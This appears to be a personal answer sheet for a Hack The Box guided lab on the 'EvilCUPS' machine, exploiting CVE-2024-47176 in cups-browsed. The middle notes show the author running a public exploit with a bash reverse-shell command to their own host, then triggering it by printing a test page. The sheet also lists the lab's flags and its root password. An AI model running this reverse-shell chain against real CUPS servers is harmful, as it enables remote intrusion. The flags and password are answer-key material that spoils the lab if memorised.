Guided:
Q: How many open TCP ports are listening on EvilCUPS?
A: 2
(631 and 22)

Q: What UDP port related to one of the TCP services is listening on EvilCUPS?
A: 631     (Cups)

Q: What version of CUPS is running on EvilCUPS?
A: 2.4.2

Q: What is the 2024 CVE ID for a vulnerability in cups-browsed that allows any user to add a printer to a machine remotely triggering a Get-Printer-Attributes request to an attacker-controlled URL?
A: CVE-2024-47176
Source: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
----------
Note: 
*) Donwloaded Ippsec's exploit at https://github.com/IppSec/evil-cups
*) lunched it, python3 evilcups.py <MY-IP> <TARGET-IP> 'bash -c "bash -i >& /dev/tcp/<MY-IP>/4444 0>&1"'
Opened Web site --> Printers --> Selected the printer i've added and made a request to 'Print Test Page' to exec my rev-shell.
-----------

Q: What user is CUPS running as on EvilCUPs?
A: lp

Q: Submit the flag located in the htb user's home directory.
A: 09fa910dade79ed742b402c733a832bd

Q: What is the name of the legit printer installed on EvilCUPS?
A: Canon_MB2300_series
(showed at the web-site / Printers)

Q: What is the full path to the completed print job with id 1 on the EvilCUPS filesystem?
A: /var/spool/cups/d00001-001
Source: https://www.cups.org/doc/spec-design.html
(At 'Jobs Files' section)

Q: What is the root user's password on EvilCUPS?
A: Br3@k-G!@ss-r00t-evilcups

Q: Submit the flag located in the root user's home directory.
A: 7a43bde40c417ffcbe010780ea52be30
